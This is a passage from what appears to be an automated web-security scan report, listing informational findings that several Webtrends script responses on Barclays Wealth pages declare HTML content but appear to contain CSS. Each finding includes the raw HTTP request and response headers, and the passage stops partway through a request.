User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:31 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.60. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.61. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.62. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a7